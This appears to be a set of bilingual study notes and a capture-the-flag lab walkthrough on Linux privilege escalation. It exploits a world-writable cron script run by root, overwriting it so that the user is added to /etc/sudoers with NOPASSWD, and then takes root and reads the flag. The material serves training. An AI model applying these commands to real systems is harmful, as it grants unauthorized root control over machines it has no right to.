Exploiting Misconfigured Cron Jobs
Cron Jobs
Linux implements task scheduling through a utility called Cron.
Cron is a time-based service that runs applications, scripts and other commands repeatedly on a specified schedule.
An application, or script that has been configured to be run repeatedly with Cron is known as a Cron job. Cron can be used to automate or repeat a wide variety of functions on a system, from daily backups to system upgrades and patches.
The crontab file is a configuration file that is used by the Cron utility to store and track Cron jobs that have been created.
Exploiting Misconfigured Cron Jobs
Cron jobs can also be run as any user on the system, this is a very important factor to keep an eye on as we will be targeting Cron jobs that have been configured to be run as the “root” user.
This is primarily because, any script or command that is run by a Cron job will run as the root user and will consequently provide us with root access.
In order to elevate our privileges, we will need to find and identify cron jobs scheduled by the root user or the files being processed by the cron job.
利用配置错误的 Cron 作业
定时任务
Linux 通过一个名为 Cron 的实用程序来实现任务调度。
Cron 是一种基于时间的服务,它按照指定的时间表重复运行应用程序、脚本和其他命令。
已配置为使用 Cron 重复运行的应用程序或脚本称为 Cron 作业。 Cron 可用于自动化或重复系统上的各种功能,从日常备份到系统升级和补丁。
Why are they created? What is the cron job? Cron job is in the context of Windows what you might consider as a scheduled task. It’s the task that has been configured to run on the specified schedule. The way system administrator utilize cron job is to repeat, otherwise repetitive tasks like taking backup for specific folders, updating packages and anything else that they would like to automate. And the great thing with cron is that you can have a particular task or script or command executed on a specified schedule. So I can set a cron job to run every one minute, of every hour, of every day, of every week, of every month. Or I can set it to run once every week, once every month, etc. It’s really a limited lesson in terms of the schedule you can set up for a specific cron job.
The typical senario that you would have is you would have a system administrator, once to automate a specific repeative task, like taking a backup of the users’ home dirctory, or any directory for that matter. They can create a cron job that executes the commands that actually perform the backups, so the command could be copy /home/user and copy to another directory, maybe under the /var directory, under the backups. What is typically done? They could create a shell script, that contains thoese commands, and then Cron job will execute that particular shell script on a sprcified schedule, so they could be done every one minute or evry week, etc.
crontab 文件是 Cron 实用程序用来存储和跟踪已创建的 Cron 作业的配置文件。
If you ever on a Linux system and want to identify what cron jobs are currently active and configured, you can display the content of crontab file and that should display the cron jobs, that have been configured for thats specific user account that you have access to.
利用配置错误的 Cron 作业
Cron 作业也可以作为系统上的任何用户运行,这是一个非常重要的关注因素,因为我们将针对已配置为以“root”用户身份运行的 Cron 作业。
A cron job can be set up by any user on the system. However, in the context of privilege escalation, We are going to be targeting Cron jobs that have been created or that have been scheduled by the “root” user. Because cron jobs that have been created or scheduled by the root user will run with root privileges.
这主要是因为,由 Cron 作业运行的任何脚本或命令都将以 root 用户身份运行,因此将为我们提供 root 访问权限。
If a shell script is been run, then it will run as root user or with root privileges. If we find a way of taking advantage of the shell script, for example, a misconfigured shell script, then we can get it to execute any other commands that we would like to execute with root privileges, we could connect to a netcat listener, and that is going to provide us with root privileges, we could run other commands, for example, we could add a specific command to add the current user that we have access to to the sudoer’s file, consequently allowing us to perform task that require root privileges or require root privileges without having to provide a password.
为了提升我们的权限,我们需要找到并识别由 root 用户安排的 cron 作业或 cron 作业正在处理的文件。
In this context, we are going to be taking a look at the cron job that runs a sprcific shell script. If the shell script has been created by the root user, the cron job has been created by the root user, how do we exploit it? What misconfigurations are we looking for? If that shell script has improper permissions, meaning that that shell script can be edited by any user on the system. That means we can input any commands we would like to execute into that shell script, once that cron job is run, that particular shell script will be executed with root privileges, and the command we specify within that shell script would be executed with root privileges.
There is multiple misconfigurations that’s around cron jobs or cron that can be used to elevate privileges.
Demo: Exploiting Misconfigured Cron Jobs(演示:利用错误配置的 Cron 作业)
1
2
whoami
groups student
It’s not a part of the sudo group. This is a unprivileged user account.
We’re going to be looking to elevate our privileges and obatin permissions associated with the root user account. We don’t need to gain access to root account, if we can obatain sudo permission. That means we can execute commands that require root privileges without having to provide password.
1
cat /etc/passwd
You can identify the cron jobs that have been scheduled for this particular user by saying
1
crontal -l
How do we find out whether we have cron job that have been scheduled by the root user? It’s going to require a lot of enumeration or searching.
1
2
3
4
ls -al
-rw------- 1 root root 26 Sep 23 2018 message
pwd
/home/student
Why would the root user account store a file within the student account. Could this file potentially be asscociated with a cron job?
1
2
cat message
cat: message: Permission denied
Because it’s owned by the actual root user. And you can see the actual permissions here, only the root user can read and write or make changes to it, whereas every other user account and group on the system doesn’t have the privileges associated or required to read the contents of this file, or make changes to it.
We know this particular file is been stored within the student’s home directory.
1
2
pwd
/home/student
So, we could try and identify where this particular string of text where the path is specified.
In order to do this, we are going to look for all accurency of the path specified to the file, and try to see whether we have the currency within the shell script or any other file for that matter. That may share a like on what is been done, why this file exists within the home directory.
Use grep utility, search recusively, start of with the /usr directory, this is typically where you will find the shell script be installed. And what we are looking for is any accurrency of the path.
Utilize the grep utility to find any accurency of the path /home/student/message, because if there is a shell script that’s been used, then it’s very like that contains the actual path or rather actual path to the particular file or where this file is been installed.
1
2
3
cd /
grep -rnw /usr -e "/home/student/message"
/usr/local/share/copy.sh:2:cp /home/student/message /tmp/message
1
2
3
ls -al /tmp
-rw-r--r-- 1 root root 26 Jan 3 00:09 message
cat /tmp/message
Let’s take a look at the shell script and let’s see what exactly is been done.
However, before we do that, let’s check the permission for the shell script. Can we actually modify it? And get it to run with root privileges or get it to execute any of our own commands with root privileges.
1
2
ls -al /usr/local/share/copy.sh
-rwxrwxrwx 1 root root 74 Sep 23 2018 /usr/local/share/copy.sh
This script is owned by the root account. But if we take a look at the permissions, we can see that every user account and group on the system, has read, write and execute permissions, which means we can execute this, or rather we can edit it.
We want to add a line of code within this particular shell script. We want to have the cron job executed this. We really unaware of where the schedule behind the cron job. This lab environment will execute cron job every one minute. So after one minute, this script will be executed. So if we get it to execute specific command that will add us to the sudoer’s group, or rather to the sudoer’s file, consequently providing us with elevated privileges or root privileges.
1
2
3
4
cat /usr/local/share/copy.sh
#! /bin/bash
cp /home/student/message /tmp/message
chmod 644 /tmp/message
It’s the same file. All that’s happening is the cron job of this shell cript is copying the message file from /home/student into the /tmp directory and then changing the permissions.
The text we want to redirect is going to involve the student account, so we said student should have all permissions without providing the password. And this comes down to Linux permissions. All permissions.
We echo or redirect the following output into the sudoers file. The student account should have all privileges and does not need to specify a password. And this particular command requires the ability to edit the sudoers file requires root privileges. So this will only be executed once the shell script is executed.
So, we close the quotation mark there and we’re going to append it to the /etc/sudoers file. Close the single quote, and we are going to output this entire command into the actual shell script that has been executed by the cron job.
1
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
1
2
3
cat /usr/local/share/copy.sh
#!/bin/bash
echo "student ALL=NOPASSWD:ALL" >> /etc/sudoers
So, now we are just gonna wait a couple of miniutes. We can view the users that are part of the sudoers group by saying:
1
2
3
4
5
sudo -l
User student may run the following commands on attackdefense:
(root) NOPASSWD: /etc/init.d/cron
(root) NOPASSWD: ALL
And right over here, you can see nopasswd before they could actually interact with cron utility. Now they can run any commands here without providing any password. So the cron job is run, and it added the student account to the sudoers group. That means we can execute any other commands that require root privileges.
We’ve elevated or switched to the root user.
1
2
3
4
5
sudo su
whoami
cd /root
ls
cat flag
That’s how to elevate privileges by exploiting a misconfigured cron job.
I just hightlight and go over what we’ve done.
First step, involve identifing files or scripts that have been used by cron job. We can be sure when the cron job or schedule the cron job is using to run.
Once we identify the shell script that has been used or been run by the cron job. We can then identify whether the shell scirpt can be modified by a non-privileged user.
We then modify the shell script and add the command that would add our current user to the sudoers file, consequently allowing us to run commands that require root privileges without providing a password. In this case, we are able to switch to root user.
1
2
root@attackdefense:~# crontab -l
*/01 * * * * sh /usr/local/share/copy.sh *
You can see the cron job that was created by the root user, that runs every one minute, and run the shell script copy.sh.
Cron Jobs Gone Wild II
概述
在系统上执行定期维护任务时,Cron 是管理员的救命稻草。它们甚至可以用于在单个用户目录中执行任务的情况。但是,此类自动化需要谨慎使用,否则可能导致简单的权限提升攻击。
你的任务是在盒子上获得一个 root shell并取回旗帜!
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-77.pdf
我自己的思路
Cron is a life save for admins when it comes to doing periodic maintainence tasks on the system. They can even be used in cases where tasks are performed within individual user directories. However, such automations need to be used with caution or can lead to easy privilege escalation attacks.
Your mission is to get a root shell on the boxand retrieve the flag!
1
2
3
4
5
6
7
8
9
10
11
12
13
student@attackdefense:~$ whoami
student
student@attackdefense:~$ groups student
student : student
student@attackdefense:~$ ls -al
total 12
drwxr-xr-x 1 student student 4096 Sep 23 2018 .
drwxr-xr-x 1 root root 4096 Sep 23 2018 ..
-rw------- 1 root root 26 Sep 23 2018 message
student@attackdefense:~$ cat message
cat: message: Permission denied
student@attackdefense:~$ pwd
/home/student
1
2
3
4
5
6
7
8
9
student@attackdefense:~$ grep -rnw /usr -e '/home/student/message'
/usr/local/share/copy.sh:2:cp /home/student/message /tmp/message
student@attackdefense:~$ ls -al /tmp
total 12
drwxrwxrwt 1 root root 4096 Nov 1 02:42 .
drwxr-xr-x 1 root root 4096 Nov 1 02:32 ..
-rw-r--r-- 1 root root 26 Nov 1 02:42 message
student@attackdefense:~$ cat /tmp/message
Hey!! you are not root :(
1
2
3
4
5
6
student@attackdefense:~$ ls -al /usr/local/share/copy.sh
-rwxrwxrwx 1 root root 74 Sep 23 2018 /usr/local/share/copy.sh
student@attackdefense:~$ cat /usr/local/share/copy.sh
#! /bin/bash
cp /home/student/message /tmp/message
chmod 644 /tmp/message
1
2
3
4
student@attackdefense:~$ printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
student@attackdefense:~$ cat /usr/local/share/copy.sh
#!/bin/bash
echo "student ALL=NOPASSWD:ALL" >> /etc/sudoers
1
2
3
4
5
6
7
8
student@attackdefense:~$ sudo -l
Matching Defaults entries for student on attackdefense:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User student may run the following commands on attackdefense:
(root) NOPASSWD: /etc/init.d/cron
(root) NOPASSWD: ALL
(root) NOPASSWD: ALL
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
student@attackdefense:~$ sudo su
root@attackdefense:/home/student# whoami
root
root@attackdefense:/home/student# groups root
root : root
root@attackdefense:/home/student# cd ~
root@attackdefense:~# ls -al
total 20
drwx------ 1 root root 4096 Nov 2 2018 .
drwxr-xr-x 1 root root 4096 Nov 1 02:32 ..
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Nov 2 2018 flag
root@attackdefense:~# cat flag
697914df7a07bb9b718c8ed258150164
root@attackdefense:~# crontab -l
*/01 * * * * sh /usr/local/share/copy.sh *
